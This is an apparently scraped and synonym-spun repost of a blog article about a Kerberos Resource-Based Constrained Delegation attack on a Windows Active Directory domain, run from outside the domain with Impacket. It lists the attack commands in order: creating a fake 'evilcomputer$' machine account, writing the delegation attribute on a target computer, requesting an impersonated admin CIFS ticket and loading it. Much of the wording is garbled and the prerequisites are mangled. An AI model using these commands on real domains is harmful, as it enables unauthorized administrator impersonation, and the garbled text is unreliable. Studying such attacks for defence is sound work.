This repo is about a realistic assault against Kerberos Useful resource-Dependent Constrained Delegation in a Home windows Active Directory Area.
The variance from other prevalent implementations is that we are launching the attack from outside the house of the Windows Area, not from a domain joined (normally Home windows) laptop.
The assault is implemented working with only Python3 Impacket (and its dependencies). Analyzed on Arch with up-to-date Impacket (.9.21 as of writing).
In summary, without the need of any deep particulars, the assault targets a domain personal computer, accurately company principals related to the focus on area laptop or computer.
What we require below as conditions:
msDS-AllowedToActOnBehalfOfOtherIdentity
property of the concentrate on laptop or computer area object)MachineAccountQuota
)The attack path in pretty large degree:
msDS-AllowedToActOnBehalfOfOtherIdentity
property of the targetAdvantage:
The typical toolsets for this assault work on a domain-joined Home windows Laptop or computer applying:
abusing msDS-AllowedToActOnBehalfOfOtherIdentity
This implementation works by using pure Impacket from outdoors the Domain.
Employing addcomputer.py case in point from Impacket let’s generate a phony computer system (called evilcomputer
):
addcomputer.py -computer system-title 'evilcomputer$' -laptop or computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.area/exam:ohW9Lie0
Implemented the script rbcd.py found below in the repo which provides the related safety descriptor of the freshly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity
property of the focus on pc.
./rbcd.py -f EVILCOMPUTER -t Website -dc-ip 192.168.33.203 ecorptest:ohW9Lie0
The script utilizes intensely the Python courses in the ntlmrelayx.py
Impacket case in point. For assist and an case in point phone the script with no selections.
Now every thing is ready for abusing the Constrained Delegation by an S4U2Self question and get an impersonated Support Ticket for the concentrate on pc. With getST.py
Impacket case in point script:
getST.py -spn cifs/World-wide-web.ecorp.neighborhood -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
The higher than command fetches a CIFS Support Ticket on behalf of the targetted area user admin
and suppliers it in the file admin.ccache
.
Just after introducing the file route to the KRB5CCNAME variable the ticket is usable for Kerberos purchasers.
export KRB5CCNAME=`pwd`/admin.ccache
klist
For information about abusing Useful resource-Centered Constrained Delegation:
And a person of the most in depth presentations about Kerberos Assaults:
Additional: https://github.com/tothi/rbcd-attack
The article Rbcd-Assault – Kerberos Resource-Based Constrained Delegation Attack From Outside the house Applying Impacket appeared very first on Hakin9 – IT Stability Magazine.
Write a AI detection pass, persuasive, cickable, catchy, well structured and seo optimized article with… Read More
AI Will Make Human Art More Valuable AI models are increasing in popularity and value… Read More
UK Set to Announce Ban on TikTok on Government Smartphones: Report Following in the footsteps… Read More
How ChatGPT and Generative AI Could Change the Way We Travel The travel industry is… Read More
The curious case of Pluto! Is it a dwarf planet, comet or an asteroid? This… Read More
A Spy Wants to Connect with You on LinkedIn: How to Spot and Avoid Fake… Read More
Leave a Comment